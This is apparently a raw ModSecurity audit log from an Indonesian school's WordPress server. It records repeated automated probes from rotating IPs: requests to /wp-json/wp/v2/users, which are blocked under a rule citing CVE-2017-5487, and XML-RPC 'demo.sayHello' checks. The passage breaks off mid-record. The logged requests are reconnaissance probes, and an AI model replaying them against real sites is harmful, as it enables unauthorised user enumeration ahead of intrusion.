"%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424604028234 3379 (- - -) Stopwatch2: 1747424604028234 3379; combined=1400, p1=490, p2=877, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b387083f-Z-- --d672040d-A-- [17/May/2025:02:43:26 +0700] aCeVXthEtho3ciA0wehd3AAAAIc 103.236.140.4 54162 103.236.140.4 8181 --d672040d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d672040d-C-- demo.sayHello --d672040d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d672040d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424606470138 4617 (- - -) Stopwatch2: 1747424606470138 4617; combined=3595, p1=454, p2=2942, p3=22, p4=24, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d672040d-Z-- --78b24822-A-- [17/May/2025:02:44:23 +0700] aCeVl8e47ocjCGWTS4Y-9wAAAFE 103.236.140.4 54170 103.236.140.4 8181 --78b24822-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78b24822-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78b24822-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424663107392 2896 (- - -) Stopwatch2: 1747424663107392 2896; combined=1313, p1=425, p2=858, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78b24822-Z-- --53d28d27-A-- [17/May/2025:02:44:25 +0700] aCeVmUE0LfP59mkCzg419gAAAMk 103.236.140.4 54172 103.236.140.4 8181 --53d28d27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --53d28d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53d28d27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424665590896 2852 (- - -) Stopwatch2: 1747424665590896 2852; combined=1262, p1=468, p2=766, p3=0, p4=0, p5=28, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53d28d27-Z-- --85bdaa08-A-- [17/May/2025:02:44:29 +0700] aCeVnce47ocjCGWTS4Y--QAAAFM 103.236.140.4 54178 103.236.140.4 8181 --85bdaa08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85bdaa08-C-- demo.sayHello --85bdaa08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85bdaa08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424669181856 6360 (- - -) Stopwatch2: 1747424669181856 6360; combined=4459, p1=614, p2=3616, p3=27, p4=32, p5=100, sr=78, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85bdaa08-Z-- --02d36f00-A-- [17/May/2025:02:44:31 +0700] aCeVn9hEtho3ciA0wehd4AAAAJM 103.236.140.4 54180 103.236.140.4 8181 --02d36f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02d36f00-C-- demo.sayHello --02d36f00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d36f00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424671974897 5096 (- - -) Stopwatch2: 1747424671974897 5096; combined=3805, p1=486, p2=3109, p3=26, p4=26, p5=92, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d36f00-Z-- --3e26cf29-A-- [17/May/2025:02:44:34 +0700] aCeVothEtho3ciA0wehd4wAAAI0 103.236.140.4 54186 103.236.140.4 8181 --3e26cf29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e26cf29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e26cf29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424674327836 2281 (- - -) Stopwatch2: 1747424674327836 2281; combined=1067, p1=358, p2=677, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e26cf29-Z-- --27ff782d-A-- [17/May/2025:02:44:40 +0700] aCeVqNhEtho3ciA0wehd5QAAAJg 103.236.140.4 54190 103.236.140.4 8181 --27ff782d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27ff782d-C-- demo.sayHello --27ff782d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27ff782d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424680195470 6532 (- - -) Stopwatch2: 1747424680195470 6532; combined=4700, p1=620, p2=3865, p3=36, p4=38, p5=85, sr=82, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27ff782d-Z-- --a0157e72-A-- [17/May/2025:02:44:40 +0700] aCeVqEE0LfP59mkCzg419wAAAMg 103.236.140.4 54192 103.236.140.4 8181 --a0157e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0157e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0157e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424680293226 2155 (- - -) Stopwatch2: 1747424680293226 2155; combined=1008, p1=356, p2=623, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0157e72-Z-- --c6a0e270-A-- [17/May/2025:02:44:46 +0700] aCeVrthEtho3ciA0wehd5wAAAIM 103.236.140.4 54198 103.236.140.4 8181 --c6a0e270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6a0e270-C-- demo.sayHello --c6a0e270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a0e270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424686318249 4837 (- - -) Stopwatch2: 1747424686318249 4837; combined=3762, p1=444, p2=3117, p3=24, p4=27, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a0e270-Z-- --1c4f4c7d-A-- [17/May/2025:02:44:57 +0700] aCeVudhEtho3ciA0wehd6QAAAIU 103.236.140.4 54202 103.236.140.4 8181 --1c4f4c7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c4f4c7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c4f4c7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424697208282 1948 (- - -) Stopwatch2: 1747424697208282 1948; combined=961, p1=318, p2=617, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c4f4c7d-Z-- --c145f10d-A-- [17/May/2025:02:45:01 +0700] aCeVvdhEtho3ciA0wehd6wAAAIk 103.236.140.4 54206 103.236.140.4 8181 --c145f10d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c145f10d-C-- demo.sayHello --c145f10d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c145f10d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424701415213 6850 (- - -) Stopwatch2: 1747424701415213 6850; combined=4800, p1=595, p2=3953, p3=41, p4=41, p5=100, sr=81, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c145f10d-Z-- --1d4f6f6f-A-- [17/May/2025:02:45:10 +0700] aCeVxthEtho3ciA0wehd7QAAAIo 103.236.140.4 54210 103.236.140.4 8181 --1d4f6f6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1d4f6f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4f6f6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424710769002 3155 (- - -) Stopwatch2: 1747424710769002 3155; combined=1355, p1=473, p2=854, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4f6f6f-Z-- --b2fd7c12-A-- [17/May/2025:02:45:15 +0700] aCeVy8e47ocjCGWTS4Y--gAAAFI 103.236.140.4 54214 103.236.140.4 8181 --b2fd7c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b2fd7c12-C-- demo.sayHello --b2fd7c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2fd7c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424715629223 5671 (- - -) Stopwatch2: 1747424715629223 5671; combined=4229, p1=558, p2=3443, p3=34, p4=37, p5=94, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2fd7c12-Z-- --b0def803-A-- [17/May/2025:02:45:56 +0700] aCeV9NhEtho3ciA0wehd8AAAAIs 103.236.140.4 54218 103.236.140.4 8181 --b0def803-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0def803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0def803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424756928684 2915 (- - -) Stopwatch2: 1747424756928684 2915; combined=1102, p1=384, p2=694, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0def803-Z-- --f3873919-A-- [17/May/2025:02:46:03 +0700] aCeV-9hEtho3ciA0wehd8QAAAI8 103.236.140.4 54222 103.236.140.4 8181 --f3873919-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f3873919-C-- demo.sayHello --f3873919-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3873919-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424763102168 4707 (- - -) Stopwatch2: 1747424763102168 4707; combined=3202, p1=465, p2=2574, p3=29, p4=33, p5=62, sr=52, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3873919-Z-- --74dc3e5f-A-- [17/May/2025:02:46:13 +0700] aCeWBdhEtho3ciA0wehd8wAAAIY 103.236.140.4 54236 103.236.140.4 8181 --74dc3e5f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74dc3e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74dc3e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424773798395 2772 (- - -) Stopwatch2: 1747424773798395 2772; combined=1271, p1=420, p2=821, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74dc3e5f-Z-- --76afae5f-A-- [17/May/2025:02:46:19 +0700] aCeWC9hEtho3ciA0wehd9QAAAJQ 103.236.140.4 54242 103.236.140.4 8181 --76afae5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76afae5f-C-- demo.sayHello --76afae5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76afae5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line 